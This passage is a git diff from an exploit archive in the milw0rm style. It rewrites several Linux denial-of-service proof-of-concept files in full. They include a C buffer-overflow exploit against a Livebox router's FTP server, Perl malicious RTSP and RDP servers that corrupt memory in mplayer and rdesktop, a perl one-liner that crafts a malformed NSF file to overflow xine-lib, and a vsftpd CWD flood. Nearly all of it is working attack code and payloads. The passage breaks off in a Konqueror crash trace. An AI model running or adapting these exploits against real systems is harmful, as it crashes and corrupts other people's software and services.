+//eof + +// milw0rm.com [2007-12-14] diff --git a/platforms/linux/dos/5210.c b/platforms/linux/dos/5210.c index 59fa22c51..ba6f99e9b 100755 --- a/platforms/linux/dos/5210.c +++ b/platforms/linux/dos/5210.c 
@@ -1,114 +1,114 @@ -/* -Discovered bY 0in From DaRk-CodeRs Programming & Security Group! -Contact: 0in(dot)email[at]gmail(dot)com -HOMEPAGE: http://dark-coders.4rh.eu - -DESCRIPTION: - -Livebox router is vulnerability to remote (but from local network, because firewall working..) buffer overflow DoS attack to FTP service. - - -POC: -*/ - -#include -#include -#include -#include -#include -#include -#include -#include - -int port=21; -struct hostent *he; -struct sockaddr_in their_addr; - - - -int konekt(char *addr) -{ -int sock; - -he=gethostbyname(addr); -if(he==NULL) -{ -printf("Unknow host!\nexiting..."); -return -1; -} -if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) -{ -perror("socket"); -return -2; -} - -their_addr.sin_family = AF_INET; -their_addr.sin_port = htons(port); -their_addr.sin_addr = *((struct in_addr *)he->h_addr); -memset(&(their_addr.sin_zero), '\0', 8); -if (connect(sock, (struct sockaddr *)&their_addr, -sizeof(struct sockaddr)) == -1) -{ -perror("connect"); -return -1; -} - -return sock; -} - -int main(int argc,char *argv[]) -{ -printf("\n+===============================Yeah======================================+"); -printf("\n+= ADI Convergence Galaxy FTP Server v1.0 (Neostrada Livebox DSL Router) =+"); -printf("\n+= Remote Buffer Overflow DoS Exploit =+"); -printf("\n+= bY =+"); -printf("\n+= Maks M. [0in] From Dark-CodeRs Security & Programming Group! 
=+"); -printf("\n+= 0in(dot)email[at]gmail(dot)com =+"); -printf("\n+= Please visit: http://dark-coders.4rh.eu =+"); -printf("\n+= Greetings to: Die_Angel, Sun8hclf, M4r1usz, Aristo89, Djlinux =+"); -printf("\n+= And other friends: MaLy, Slim, elwin013, Rade0n3900, Wojto111, =+"); -printf("\n+= Chomzee, AfroPL, Joker186 =+"); -printf("\n+===============================Yeah======================================+"); - -if(argc<2) -{ -printf("\nUse %s [IP]!\n",argv[0]); -exit(0); -} -printf("\nConnecting to:%s...",argv[1]); -int sock=konekt(argv[1]); -if(sock<0) -{ -printf("\neh..."); -exit(0); -} -printf("\nConnected!!\n"); -char rcv[256]; -recv(sock,rcv,255,0); -printf("\n%s\n",rcv); -printf("\nSending evil buffer.."); -char evil[100*100]="%n\x01\x02\x03\x04"; -int i; -for(i=0;i<(100*100)-100;i++) -{ -strcat(evil,"A"); -} - -strcat(evil,"\r\n"); -send(sock,evil,strlen(evil),0); -strcpy(rcv,""); -recv(sock,rcv,255,0); -printf("\n%s\n",rcv); -char pass[100*1000]="PASS "; -strcat(pass,evil); -strcat(pass,"\n\r"); -send(sock,pass,strlen(pass),0); -strcpy(rcv,""); -recv(sock,rcv,255,0); -printf("\n%s\n",rcv); -printf("\nOK!\nYou're Livebox FTP server should fucked out..."); - -exit(0); -} - -// milw0rm.com [2008-03-01] +/* +Discovered bY 0in From DaRk-CodeRs Programming & Security Group! +Contact: 0in(dot)email[at]gmail(dot)com +HOMEPAGE: http://dark-coders.4rh.eu + +DESCRIPTION: + +Livebox router is vulnerability to remote (but from local network, because firewall working..) buffer overflow DoS attack to FTP service. 
+ + +POC: +*/ + +#include +#include +#include +#include +#include +#include +#include +#include + +int port=21; +struct hostent *he; +struct sockaddr_in their_addr; + + + +int konekt(char *addr) +{ +int sock; + +he=gethostbyname(addr); +if(he==NULL) +{ +printf("Unknow host!\nexiting..."); +return -1; +} +if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) +{ +perror("socket"); +return -2; +} + +their_addr.sin_family = AF_INET; +their_addr.sin_port = htons(port); +their_addr.sin_addr = *((struct in_addr *)he->h_addr); +memset(&(their_addr.sin_zero), '\0', 8); +if (connect(sock, (struct sockaddr *)&their_addr, +sizeof(struct sockaddr)) == -1) +{ +perror("connect"); +return -1; +} + +return sock; +} + +int main(int argc,char *argv[]) +{ +printf("\n+===============================Yeah======================================+"); +printf("\n+= ADI Convergence Galaxy FTP Server v1.0 (Neostrada Livebox DSL Router) =+"); +printf("\n+= Remote Buffer Overflow DoS Exploit =+"); +printf("\n+= bY =+"); +printf("\n+= Maks M. [0in] From Dark-CodeRs Security & Programming Group! 
=+"); +printf("\n+= 0in(dot)email[at]gmail(dot)com =+"); +printf("\n+= Please visit: http://dark-coders.4rh.eu =+"); +printf("\n+= Greetings to: Die_Angel, Sun8hclf, M4r1usz, Aristo89, Djlinux =+"); +printf("\n+= And other friends: MaLy, Slim, elwin013, Rade0n3900, Wojto111, =+"); +printf("\n+= Chomzee, AfroPL, Joker186 =+"); +printf("\n+===============================Yeah======================================+"); + +if(argc<2) +{ +printf("\nUse %s [IP]!\n",argv[0]); +exit(0); +} +printf("\nConnecting to:%s...",argv[1]); +int sock=konekt(argv[1]); +if(sock<0) +{ +printf("\neh..."); +exit(0); +} +printf("\nConnected!!\n"); +char rcv[256]; +recv(sock,rcv,255,0); +printf("\n%s\n",rcv); +printf("\nSending evil buffer.."); +char evil[100*100]="%n\x01\x02\x03\x04"; +int i; +for(i=0;i<(100*100)-100;i++) +{ +strcat(evil,"A"); +} + +strcat(evil,"\r\n"); +send(sock,evil,strlen(evil),0); +strcpy(rcv,""); +recv(sock,rcv,255,0); +printf("\n%s\n",rcv); +char pass[100*1000]="PASS "; +strcat(pass,evil); +strcat(pass,"\n\r"); +send(sock,pass,strlen(pass),0); +strcpy(rcv,""); +recv(sock,rcv,255,0); +printf("\n%s\n",rcv); +printf("\nOK!\nYou're Livebox FTP server should fucked out..."); + +exit(0); +} + +// milw0rm.com [2008-03-01] diff --git a/platforms/linux/dos/5307.pl b/platforms/linux/dos/5307.pl index bdf7632b4..72d0a352a 100755 --- a/platforms/linux/dos/5307.pl +++ b/platforms/linux/dos/5307.pl 
@@ -1,131 +1,131 @@ -#!/usr/bin/perl - -# Huston, mplayer got some vulns! :( -# CVE-2008-0073 also apply to mplayer and vlc with some distinctions. -# -# Assuming kernel.va_randomize=0 this overwrite EIP with a "stream" structure on my box. -# -# The first element of the "stream" structure is a user-supplied buffer so it is not really useful to overwrite -# EIP, let's find the right target: we can overwrite every memory location beyond the desc->stream pointer and -# some before it. -# -# Vulnerable code: -# sdpplin_parse_stream() -# desc->stream_id=atoi(buf); -# spplin_parse() -# desc->stream[stream->stream_id]=stream; -# -# Test: -# - mplayer rtsp://evilhost/evil.rm -# eax 0xa0737008 // pointer to desc->stream -# edx 0x0495badd // "streamid" value -# edi 0x089b59e8 // pointer to stream -# -# : mov DWORD PTR [eax+edx*4],edi - -use warnings; -use strict; -use IO::Socket; - -my $evil_num = "127467297"; # this is a 4byte offset from desc->stream - - -my $rtp_hello = "RTSP/1.0 200 OK\r\n". - "CSeq: 1\r\n". - "Date: Thu, 20 Mar 2008 20:07:39 GMT\r\n". - "Server: RealServer Version 9.0.2.794 (sunos-5.8-sparc-server)\r\n". - "Public: OPTIONS, DESCRIBE, ANNOUNCE, PLAY, SETUP, GET_PARAMETER, SET_PARAMETER, TEARDOWN\r\n". - "RealChallenge1: de6654ba4935b8b9d8af3ba8d6f8e71c\r\n". - "StatsMask: 3\r\n\r\n"; - -my $rtp_evil = "RTSP/1.0 200 OK\r\n". - "CSeq: 2\r\n". - "Date: Thu, 20 Mar 2008 20:08:34 GMT\r\n". - "vsrc: http://0.00.00.00:31337\r\n". - "Content-base: rtsp://0.00.00.00:554/bu.rm\r\n". - "ETag: 55370-2\r\n". - "Session: 93033-2\r\n". - "Content-type: application/sdp\r\n". - "Content-length: 677\r\n\r\n". - - "v=0\r\n". - "o=-1028652722 1028652722 IN IP4 0.00.00.00\r\n". - "s=realmp3\r\n". - "i= \r\n". - "c=IN IP4 0.0.0.0\r\n". - "t=0 0\r\n". - "a=SdpplinVersion:1610645242\r\n". - "a=StreamCount:integer;\"1166000000\"\r\n". - "a=Title:buffer;\"dtFabH2rNoP=\"\r\n". - "a=range:npt=0-39.471000\r\n". - "m=audio 0 RTP/AVP 101\r\n". 
# this is referenced by "stream" - "b=AS:128\r\n". - "a=control:streamid=$evil_num\r\n". - "a=range:npt=0-39.471000\r\n". - "a=length:npt=39.471000\r\n". - "a=rtpmap:101 X-MP3-draft-00/1000\r\n". - "a=mimetype:string;\"audio/X-MP3-draft-00\"\r\n". - "a=StartTime:integer;0\r\n". - "a=AvgBitRate:integer;128000\r\n". - "a=SampleRate:integer;44100\r\n". - "a=AvgPacketSize:integer;417\r\n". - "a=Preroll:integer;1000\r\n". - "a=NumChannels:integer;2\r\n". - "a=MaxPacketSize:integer;1024\r\n". - "a=ASMRuleBook:string;\"AverageBandwidth=128000, AverageBandwidthStd=0, Priority=9;\"\r\n"; - - - -my @resps = ( $rtp_hello, - $rtp_evil, - - "RTSP/1.0 200 OK\r\n". - "CSeq: 3\r\n". - "Date: Sat, 22 Mar 2008 20:45:47 GMT\r\n". - "Session: 93033-2\n\r". - "Reconnect: true\n\r". - "RealChallenge3: 2520b5cd0e5e5622ec25f563312aba3e4f213d09,sdr=2b05ef3b\n\r". - "RDTFeatureLevel: 2\r\n". - "Transport: x-pn-tng/tcp;interleaved=0\r\n\r\n", - - "RTSP/1.0 200 OK\r\n". - "CSeq: 4\r\n". - "Date: Sat, 22 Mar 2008 15:11:06 GMT\r\n". - "Session: 93033-2\r\n\r\n", - - "RTSP/1.0 200 OK\r\n". - "CSeq: 5\r\n". - "Date: Sat, 22 Mar 2008 15:11:06 GMT". - "RTP-Info: url=rtsp://0.00.00.00/bu.rm\r\n\r\n", - ); - - -my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '554', Listen => 1, Reuse => 1); - -while(my $csock = $sock->accept) -{ - foreach my $resp(@resps) - { - my $buf = read_from_sock($csock); - print $csock $resp; - } -} - - -sub read_from_sock() -{ - my ($sock) = @_; - - my $buffer = ""; - - while(<$sock>) - { - return $buffer if /^\r\n$/; - $buffer .= $_; - } - - return $buffer; - -} - -# milw0rm.com [2008-03-25] +#!/usr/bin/perl + +# Huston, mplayer got some vulns! :( +# CVE-2008-0073 also apply to mplayer and vlc with some distinctions. +# +# Assuming kernel.va_randomize=0 this overwrite EIP with a "stream" structure on my box. 
+# +# The first element of the "stream" structure is a user-supplied buffer so it is not really useful to overwrite +# EIP, let's find the right target: we can overwrite every memory location beyond the desc->stream pointer and +# some before it. +# +# Vulnerable code: +# sdpplin_parse_stream() +# desc->stream_id=atoi(buf); +# spplin_parse() +# desc->stream[stream->stream_id]=stream; +# +# Test: +# - mplayer rtsp://evilhost/evil.rm +# eax 0xa0737008 // pointer to desc->stream +# edx 0x0495badd // "streamid" value +# edi 0x089b59e8 // pointer to stream +# +# : mov DWORD PTR [eax+edx*4],edi + +use warnings; +use strict; +use IO::Socket; + +my $evil_num = "127467297"; # this is a 4byte offset from desc->stream + + +my $rtp_hello = "RTSP/1.0 200 OK\r\n". + "CSeq: 1\r\n". + "Date: Thu, 20 Mar 2008 20:07:39 GMT\r\n". + "Server: RealServer Version 9.0.2.794 (sunos-5.8-sparc-server)\r\n". + "Public: OPTIONS, DESCRIBE, ANNOUNCE, PLAY, SETUP, GET_PARAMETER, SET_PARAMETER, TEARDOWN\r\n". + "RealChallenge1: de6654ba4935b8b9d8af3ba8d6f8e71c\r\n". + "StatsMask: 3\r\n\r\n"; + +my $rtp_evil = "RTSP/1.0 200 OK\r\n". + "CSeq: 2\r\n". + "Date: Thu, 20 Mar 2008 20:08:34 GMT\r\n". + "vsrc: http://0.00.00.00:31337\r\n". + "Content-base: rtsp://0.00.00.00:554/bu.rm\r\n". + "ETag: 55370-2\r\n". + "Session: 93033-2\r\n". + "Content-type: application/sdp\r\n". + "Content-length: 677\r\n\r\n". + + "v=0\r\n". + "o=-1028652722 1028652722 IN IP4 0.00.00.00\r\n". + "s=realmp3\r\n". + "i= \r\n". + "c=IN IP4 0.0.0.0\r\n". + "t=0 0\r\n". + "a=SdpplinVersion:1610645242\r\n". + "a=StreamCount:integer;\"1166000000\"\r\n". + "a=Title:buffer;\"dtFabH2rNoP=\"\r\n". + "a=range:npt=0-39.471000\r\n". + "m=audio 0 RTP/AVP 101\r\n". # this is referenced by "stream" + "b=AS:128\r\n". + "a=control:streamid=$evil_num\r\n". + "a=range:npt=0-39.471000\r\n". + "a=length:npt=39.471000\r\n". + "a=rtpmap:101 X-MP3-draft-00/1000\r\n". + "a=mimetype:string;\"audio/X-MP3-draft-00\"\r\n". + "a=StartTime:integer;0\r\n". 
+ "a=AvgBitRate:integer;128000\r\n". + "a=SampleRate:integer;44100\r\n". + "a=AvgPacketSize:integer;417\r\n". + "a=Preroll:integer;1000\r\n". + "a=NumChannels:integer;2\r\n". + "a=MaxPacketSize:integer;1024\r\n". + "a=ASMRuleBook:string;\"AverageBandwidth=128000, AverageBandwidthStd=0, Priority=9;\"\r\n"; + + + +my @resps = ( $rtp_hello, + $rtp_evil, + + "RTSP/1.0 200 OK\r\n". + "CSeq: 3\r\n". + "Date: Sat, 22 Mar 2008 20:45:47 GMT\r\n". + "Session: 93033-2\n\r". + "Reconnect: true\n\r". + "RealChallenge3: 2520b5cd0e5e5622ec25f563312aba3e4f213d09,sdr=2b05ef3b\n\r". + "RDTFeatureLevel: 2\r\n". + "Transport: x-pn-tng/tcp;interleaved=0\r\n\r\n", + + "RTSP/1.0 200 OK\r\n". + "CSeq: 4\r\n". + "Date: Sat, 22 Mar 2008 15:11:06 GMT\r\n". + "Session: 93033-2\r\n\r\n", + + "RTSP/1.0 200 OK\r\n". + "CSeq: 5\r\n". + "Date: Sat, 22 Mar 2008 15:11:06 GMT". + "RTP-Info: url=rtsp://0.00.00.00/bu.rm\r\n\r\n", + ); + + +my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '554', Listen => 1, Reuse => 1); + +while(my $csock = $sock->accept) +{ + foreach my $resp(@resps) + { + my $buf = read_from_sock($csock); + print $csock $resp; + } +} + + +sub read_from_sock() +{ + my ($sock) = @_; + + my $buffer = ""; + + while(<$sock>) + { + return $buffer if /^\r\n$/; + $buffer .= $_; + } + + return $buffer; + +} + +# milw0rm.com [2008-03-25] diff --git a/platforms/linux/dos/5458.txt b/platforms/linux/dos/5458.txt index be3a7004a..3c52a46c5 100755 --- a/platforms/linux/dos/5458.txt +++ b/platforms/linux/dos/5458.txt 
@@ -1,29 +1,29 @@
-xine-lib <= 1.1.12 is prone to a stack-based buffer overflow in the NES
-Sound Format demuxer(demux_nsf.c).
-
-
-- Code
-
-open_nsf_file():
-
-109: this->title = strdup(&header[0x0E]);
-
-demux_nsf_send_chunk():
-
-122: char title[100];
-162: sprintf(title, "%s, song %d/%d",
- this->title, this->current_song, this->total_songs);
-
-
-- Affected applications
-
-http://xinehq.de/index.php/releases
-
-
-- PoC
-
-perl -e 'print
-"\x4E\x45\x53\x4D\x1A\x01\x01\x01\x80\x80\x18\x8A\x03\x8A" . "\x41" x
-114' > evil.mp3
-
-# milw0rm.com [2008-04-16]
+xine-lib <= 1.1.12 is prone to a stack-based buffer overflow in the NES
+Sound Format demuxer(demux_nsf.c).
+
+
+- Code
+
+open_nsf_file():
+
+109: this->title = strdup(&header[0x0E]);
+
+demux_nsf_send_chunk():
+
+122: char title[100];
+162: sprintf(title, "%s, song %d/%d",
+ this->title, this->current_song, this->total_songs);
+
+
+- Affected applications
+
+http://xinehq.de/index.php/releases
+
+
+- PoC
+
+perl -e 'print
+"\x4E\x45\x53\x4D\x1A\x01\x01\x01\x80\x80\x18\x8A\x03\x8A" . "\x41" x
+114' > evil.mp3
+
+# milw0rm.com [2008-04-16]
diff --git a/platforms/linux/dos/551.c b/platforms/linux/dos/551.c
index f7e505421..7303f9c62 100755
--- a/platforms/linux/dos/551.c
+++ b/platforms/linux/dos/551.c
@@ -96,6 +96,6 @@ printf("Payload has been sent! Check if the webserver is dead! ");
 closesocket(mysocket);
 WSACleanup();
 return 0;
-}
-
-// milw0rm.com [2004-09-27]
+}
+
+// milw0rm.com [2004-09-27]
diff --git a/platforms/linux/dos/5561.pl b/platforms/linux/dos/5561.pl
index 1b8d4a74a..624047953 100755
--- a/platforms/linux/dos/5561.pl
+++ b/platforms/linux/dos/5561.pl
@@ -1,23 +1,23 @@
-#!/usr/bin/perl
-#
-# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=696
-
-use warnings;
-use strict;
-use IO::Socket;
-
-my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '3389', Listen => 1, Reuse => 1) || die($!);
-
-while(my $c = $sock->accept())
-{
- print $c "\x03" .# TPKT version
- "\x00" .# reserved
- "\x00\x01" .# evil length here
- "\x06\xd0\x00\x00\x12\x34\x00" .
- "\x41" x 204942;
-
- sleep 1;
- close $sock;
-}
-
-# milw0rm.com [2008-05-08]
+#!/usr/bin/perl
+#
+# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=696
+
+use warnings;
+use strict;
+use IO::Socket;
+
+my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '3389', Listen => 1, Reuse => 1) || die($!);
+
+while(my $c = $sock->accept())
+{
+ print $c "\x03" .# TPKT version
+ "\x00" .# reserved
+ "\x00\x01" .# evil length here
+ "\x06\xd0\x00\x00\x12\x34\x00" .
+ "\x41" x 204942;
+
+ sleep 1;
+ close $sock;
+}
+
+# milw0rm.com [2008-05-08]
diff --git a/platforms/linux/dos/5585.pl b/platforms/linux/dos/5585.pl
index 53743337a..8cb4a4797 100755
--- a/platforms/linux/dos/5585.pl
+++ b/platforms/linux/dos/5585.pl
@@ -1,95 +1,95 @@ -#!/usr/bin/perl -# -# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=697 - -use strict; -use IO::Socket; - -my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '3389', Listen => 1, Reuse => 1) || die($!); - -my $evil = "\x03\x00\x01\x47\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x81\x38" . - "\x01\x00\x10\x00" . - "\xc5\x32" . - "\x04\x75" . # PDU TYPE == 0x4 == PDU_REDIRECT - "\xb7\xda\xf8\x43" . - "\x01\x00\x00\x00" . - "\x01\x00\x00\x00" . - "\xff\xff\xff\xff" . # len of g_redirect_cookie - "\x41" x 64 ; # g_redirect_cookie - -while(my $c = $sock->accept()) -{ - while(<$c>) - { - print $c ONE(), TWO(), THREE(), FOUR(), FIVE(), SIX(), SEVEN(), $evil; - } -} - - - - -sub ONE() -{ - "\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00" -} - -sub TWO() -{ - "\x03\x00\x01\x49\x02\xf0\x80\x7f\x66\x82\x01". - "\x3d\x0a\x01\x00\x02\x01\x00\x30\x1a\x02\x01". - "\x22\x02\x01\x03\x02\x01\x00\x02\x01\x01\x02". - "\x01\x00\x02\x01\x01\x02\x03\x00\xff\xf8\x02". - "\x01\x02\x04\x82\x01\x17\x00\x05\x00\x14\x7c". - "\x00\x01\x2a\x14\x76\x0a\x01\x01\x00\x01\xc0". - "\x00\x4d\x63\x44\x6e\x81\x00\x01\x0c\x08\x00". - "\x04\x00\x08\x00\x03\x0c\x0c\x00\xeb\x03\x01". - "\x00\xec\x03\x00\x00\x02\x0c\xec\x00\x02\x00". - "\x00\x00\x02\x00\x00\x00\x20\x00\x00\x00\xb8". - "\x00\x00\x00\x29\x60\xbb\x2f\xc4\x4d\x00\x9e". - "\x58\x8a\xb4\x85\x35\x6a\x71\xea\xad\xf9\x3d". - "\x0e\x5e\x8e\x87\x64\x2d\x52\x42\xed\xb2\x91". - "\x3f\xf9\x01\x00\x00\x00\x01\x00\x00\x00\x01". - "\x00\x00\x00\x06\x00\x5c\x00\x52\x53\x41\x31". - "\x48\x00\x00\x00\x00\x02\x00\x00\x3f\x00\x00". - "\x00\x01\x00\x01\x00\xf9\xa3\x35\xb2\x78\x63". - "\x8d\x94\x65\x47\x22\x54\x49\x55\xae\x6f\x74". - "\x69\x73\x6e\xee\x2b\xa5\xd0\x47\xf6\xc0\x89". - "\x2e\xa0\x54\xf5\x12\x87\x75\xb5\x89\xf7\x83". - "\x48\xd9\x54\xeb\xde\x20\x73\xd6\xd8\xf3\xee". - "\x0f\xf7\xc2\xaa\xa4\x79\x0a\x5a\x64\x92\x53". - "\xc4\x75\xd4\x00\x00\x00\x00\x00\x00\x00\x00". 
- "\x08\x00\x48\x00\xf6\x20\x04\x62\x5b\x2f\x04". - "\xae\x02\x04\x4a\x7e\xcf\x59\x02\x11\xf7\x7f". - "\xab\x74\x95\xce\x01\x4e\xf6\x14\x50\x0b\xd7". - "\x54\x8f\xf0\x92\xd5\x0c\x6f\x42\xd8\x21\x98". - "\x9f\x87\x50\x9a\x33\x6c\xef\x65\x05\x5c\x4a". - "\x93\x51\xc1\x69\x59\x7c\x3d\xf4\x63\xdc\x53". - "\x66\x3b\x00\x00\x00\x00\x00\x00\x00\x00" -} - -sub THREE() -{ - "\x03\x00\x00\x0b\x02\xf0\x80\x2e\x00\x00\x04" -} - -sub FOUR() -{ - "\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xed\x03\xed" -} - -sub FIVE() -{ - "\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xeb\x03\xeb" -} - -sub SIX() -{ - "\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xec\x03\xec" -} - -sub SEVEN() -{ - "\x03\x00\x00\x22\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x14\x80\x02\x10\x00\xff\x03\x10\x00\x07\x00\x00\x00\x02\x00\x00\x00\x30\x9a\x00\x00" -} - -# milw0rm.com [2008-05-11] +#!/usr/bin/perl +# +# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=697 + +use strict; +use IO::Socket; + +my $sock = IO::Socket::INET->new(LocalAddr => '0.0.0.0', LocalPort => '3389', Listen => 1, Reuse => 1) || die($!); + +my $evil = "\x03\x00\x01\x47\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x81\x38" . + "\x01\x00\x10\x00" . + "\xc5\x32" . + "\x04\x75" . # PDU TYPE == 0x4 == PDU_REDIRECT + "\xb7\xda\xf8\x43" . + "\x01\x00\x00\x00" . + "\x01\x00\x00\x00" . + "\xff\xff\xff\xff" . # len of g_redirect_cookie + "\x41" x 64 ; # g_redirect_cookie + +while(my $c = $sock->accept()) +{ + while(<$c>) + { + print $c ONE(), TWO(), THREE(), FOUR(), FIVE(), SIX(), SEVEN(), $evil; + } +} + + + + +sub ONE() +{ + "\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00" +} + +sub TWO() +{ + "\x03\x00\x01\x49\x02\xf0\x80\x7f\x66\x82\x01". + "\x3d\x0a\x01\x00\x02\x01\x00\x30\x1a\x02\x01". + "\x22\x02\x01\x03\x02\x01\x00\x02\x01\x01\x02". + "\x01\x00\x02\x01\x01\x02\x03\x00\xff\xf8\x02". + "\x01\x02\x04\x82\x01\x17\x00\x05\x00\x14\x7c". + "\x00\x01\x2a\x14\x76\x0a\x01\x01\x00\x01\xc0". 
+ "\x00\x4d\x63\x44\x6e\x81\x00\x01\x0c\x08\x00". + "\x04\x00\x08\x00\x03\x0c\x0c\x00\xeb\x03\x01". + "\x00\xec\x03\x00\x00\x02\x0c\xec\x00\x02\x00". + "\x00\x00\x02\x00\x00\x00\x20\x00\x00\x00\xb8". + "\x00\x00\x00\x29\x60\xbb\x2f\xc4\x4d\x00\x9e". + "\x58\x8a\xb4\x85\x35\x6a\x71\xea\xad\xf9\x3d". + "\x0e\x5e\x8e\x87\x64\x2d\x52\x42\xed\xb2\x91". + "\x3f\xf9\x01\x00\x00\x00\x01\x00\x00\x00\x01". + "\x00\x00\x00\x06\x00\x5c\x00\x52\x53\x41\x31". + "\x48\x00\x00\x00\x00\x02\x00\x00\x3f\x00\x00". + "\x00\x01\x00\x01\x00\xf9\xa3\x35\xb2\x78\x63". + "\x8d\x94\x65\x47\x22\x54\x49\x55\xae\x6f\x74". + "\x69\x73\x6e\xee\x2b\xa5\xd0\x47\xf6\xc0\x89". + "\x2e\xa0\x54\xf5\x12\x87\x75\xb5\x89\xf7\x83". + "\x48\xd9\x54\xeb\xde\x20\x73\xd6\xd8\xf3\xee". + "\x0f\xf7\xc2\xaa\xa4\x79\x0a\x5a\x64\x92\x53". + "\xc4\x75\xd4\x00\x00\x00\x00\x00\x00\x00\x00". + "\x08\x00\x48\x00\xf6\x20\x04\x62\x5b\x2f\x04". + "\xae\x02\x04\x4a\x7e\xcf\x59\x02\x11\xf7\x7f". + "\xab\x74\x95\xce\x01\x4e\xf6\x14\x50\x0b\xd7". + "\x54\x8f\xf0\x92\xd5\x0c\x6f\x42\xd8\x21\x98". + "\x9f\x87\x50\x9a\x33\x6c\xef\x65\x05\x5c\x4a". + "\x93\x51\xc1\x69\x59\x7c\x3d\xf4\x63\xdc\x53". + "\x66\x3b\x00\x00\x00\x00\x00\x00\x00\x00" +} + +sub THREE() +{ + "\x03\x00\x00\x0b\x02\xf0\x80\x2e\x00\x00\x04" +} + +sub FOUR() +{ + "\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xed\x03\xed" +} + +sub FIVE() +{ + "\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xeb\x03\xeb" +} + +sub SIX() +{ + "\x03\x00\x00\x0f\x02\xf0\x80\x3e\x00\x00\x04\x03\xec\x03\xec" +} + +sub SEVEN() +{ + "\x03\x00\x00\x22\x02\xf0\x80\x68\x00\x01\x03\xeb\x70\x14\x80\x02\x10\x00\xff\x03\x10\x00\x07\x00\x00\x00\x02\x00\x00\x00\x30\x9a\x00\x00" +} + +# milw0rm.com [2008-05-11] diff --git a/platforms/linux/dos/5814.pl b/platforms/linux/dos/5814.pl index 0775878f9..9e698d837 100755 --- a/platforms/linux/dos/5814.pl +++ b/platforms/linux/dos/5814.pl 
@@ -1,35 +1,35 @@
-#!/usr/bin/perl -w
-
-
-#######################################################################################
-# vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, Fedora 6 to 8,
-# Foresight Linux, rPath Linux is prone to Denial-of-Service(DoS) vulnerability.
-#
-# Can be xploited by large number of CWD commands to vsftp daemon with deny_file configuration
-# option in /etc/vsftpd/vsftpd.conf or the path where FTP server is installed.
-#
-# I tried to modify local exploit found at securityfocus such that we can remotely exloit
-#
-# Author shall not bear any responsibility
-# Author: Praveen Darshanam
-# Email: praveen[underscore]recker[at]sify.com
-# Date: 07th June, 2008
-#
-#
-########################################################################################
-
-
-use Net::FTP;
-$ftp=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: $perl script_name.pl target_ip\n";
-$ftp -> login("anonymous","anonymous") || die "Could not Login...Retry";
-
-while(1)
-{
-#this loop runs infinitely
-
-$ftp -> cwd();
-}
-
-$ftp->quit;
-
-# milw0rm.com [2008-06-14]
+#!/usr/bin/perl -w
+
+
+#######################################################################################
+# vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, Fedora 6 to 8,
+# Foresight Linux, rPath Linux is prone to Denial-of-Service(DoS) vulnerability.
+#
+# Can be xploited by large number of CWD commands to vsftp daemon with deny_file configuration
+# option in /etc/vsftpd/vsftpd.conf or the path where FTP server is installed.
+#
+# I tried to modify local exploit found at securityfocus such that we can remotely exloit
+#
+# Author shall not bear any responsibility
+# Author: Praveen Darshanam
+# Email: praveen[underscore]recker[at]sify.com
+# Date: 07th June, 2008
+#
+#
+########################################################################################
+
+
+use Net::FTP;
+$ftp=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: $perl script_name.pl target_ip\n";
+$ftp -> login("anonymous","anonymous") || die "Could not Login...Retry";
+
+while(1)
+{
+#this loop runs infinitely
+
+$ftp -> cwd();
+}
+
+$ftp->quit;
+
+# milw0rm.com [2008-06-14]
diff --git a/platforms/linux/dos/6689.txt b/platforms/linux/dos/6689.txt
index 1e2a48a55..769e71f0c 100755
--- a/platforms/linux/dos/6689.txt
+++ b/platforms/linux/dos/6689.txt
@@ -1,96 +1,96 @@ -Konqueror isn't immune from fuzzing either -Konqueror, KDE's mighty mascot browser.. fuzzed. - -perl -e 'print "\n" . ""' > kdie.html - -#6 0xb7f8d410 in __kernel_vsyscall () -#7 0xb7cf2085 in raise () from /lib/tls/i686/cmov/libc.so.6 -#8 0xb7cf3a01 in abort () from /lib/tls/i686/cmov/libc.so.6 -#9 0xb7ceb10e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6 -#10 0xb6e94d10 in ?? () from /usr/lib/libX11.so.6 -#11 0xb6e9518a in _XPutXCBBuffer () from /usr/lib/libX11.so.6 -#12 0xb6e965df in _XSend () from /usr/lib/libX11.so.6 -#13 0xb6e7c758 in XLookupColor () from /usr/lib/libX11.so.6 -#14 0xb71a61d1 in QColor::setSystemNamedColor () from /usr/lib/libqt-mt.so.3 -#15 0xb721c446 in QColor::setNamedColor () from /usr/lib/libqt-mt.so.3 -#16 0xb60c5250 in ?? () from /usr/lib/libkhtml.so.4 -#17 0xb60d143b in DOM::CSSParser::parseColorFromValue () -from /usr/lib/libkhtml.so.4 -#18 0xb60d216d in DOM::CSSParser::parseColor () from /usr/lib/libkhtml.so.4 -#19 0xb60d3c9f in DOM::CSSParser::parseValue () from /usr/lib/libkhtml.so.4 -#20 0xb60d7a09 in ?? () from /usr/lib/libkhtml.so.4 -#21 0xb60d8134 in DOM::CSSParser::runParser () from /usr/lib/libkhtml.so.4 -#22 0xb60d85a2 in DOM::CSSParser::parseValue () from /usr/lib/libkhtml.so.4 -#23 0xb60d86e1 in 